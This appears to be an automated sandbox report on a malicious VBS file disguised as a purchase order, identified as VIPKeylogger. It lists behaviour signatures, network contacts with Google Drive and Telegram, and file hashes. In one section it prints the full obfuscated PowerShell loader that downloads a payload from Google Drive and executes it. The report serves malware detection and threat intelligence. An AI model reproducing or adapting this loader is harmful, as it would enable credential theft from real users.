Analysis Overview
SHA256
a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237
Threat Level: Known bad
The file DistribucionesEnelcaJanS.L.PEDIDO456799.vbs was found to be: Known bad.
Malicious Activity Summary
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_office_path
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-23 15:03
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-23 15:03
Reported
2024-10-23 15:06
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
152s
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4464 wrote to memory of 4100 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4464 wrote to memory of 4100 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1032 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1032 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1032 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1032 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| DE | 193.122.6.168:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 168.6.122.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fsmfcryq.gh4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d336b18e0e02e045650ac4f24c7ecaa7 |
| SHA1 | 87ce962bb3aa89fc06d5eb54f1a225ae76225b1c |
| SHA256 | 87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27 |
| SHA512 | e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18 |
C:\Users\Admin\AppData\Roaming\Bindehindens.Stu
| MD5 | d43327229caac3f1c1c7443675eaa345 |
| SHA1 | 169d456a6122e6a39603f3017eb16df162aca251 |
| SHA256 | 0144e44b033690c4d3387d5125a5a76003d371ca48116a53d1439f83d6b530d3 |
| SHA512 | da4cdb914c5618ca83f4f97bf28d89899bc9459ff797b6f865488a7f446b56cea77bbe37aeb2e89fb81937b6fa1929a2e6c9feca5fa2ee32344f21e0dff3a10d |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-23 15:03
Reported
2024-10-23 15:06
Platform
win7-20240708-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. 
OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi 
ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') 
;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| DE | 193.122.6.168:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.18.190.73:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 184.25.193.234:80 | www.microsoft.com | tcp |
Files
memory/2700-4-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp
memory/2700-5-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
memory/2700-6-0x000000001B6F0000-0x000000001B9D2000-memory.dmp
memory/2700-7-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
memory/2700-8-0x0000000001EE0000-0x0000000001EE8000-memory.dmp
memory/2700-9-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
memory/2700-10-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp
memory/2700-11-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
memory/2700-13-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
memory/2700-15-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FVLL3ESHKXJFXX1D8EA1.temp
| MD5 | 2d065c66d5e9293f616b97f6f99d65a1 |
| SHA1 | 5e4ad8f229ce0742ec6cba772aacc4d34aab5f9c |
| SHA256 | 391782ac7dc0a2347fbe4a0c0c123a2a5763e44d8155125b46e4c59c56c9a68d |
| SHA512 | d96f7e1449e6d7ddb1877d36b1ea60f8a38153798728f7ca2c00e476fb95e4c0a73dda342a0e1cc793ff61f52ab0aea02bcba4d00ac0968e7bc238a4ab7e92f3 |
C:\Users\Admin\AppData\Roaming\Bindehindens.Stu
| MD5 | d43327229caac3f1c1c7443675eaa345 |
| SHA1 | 169d456a6122e6a39603f3017eb16df162aca251 |
| SHA256 | 0144e44b033690c4d3387d5125a5a76003d371ca48116a53d1439f83d6b530d3 |
| SHA512 | da4cdb914c5618ca83f4f97bf28d89899bc9459ff797b6f865488a7f446b56cea77bbe37aeb2e89fb81937b6fa1929a2e6c9feca5fa2ee32344f21e0dff3a10d |
memory/2072-19-0x0000000006750000-0x000000000BA5E000-memory.dmp
memory/2276-41-0x0000000000F30000-0x0000000001F92000-memory.dmp
memory/2276-42-0x0000000000F30000-0x0000000001F92000-memory.dmp
memory/2276-43-0x0000000000F30000-0x0000000000F78000-memory.dmp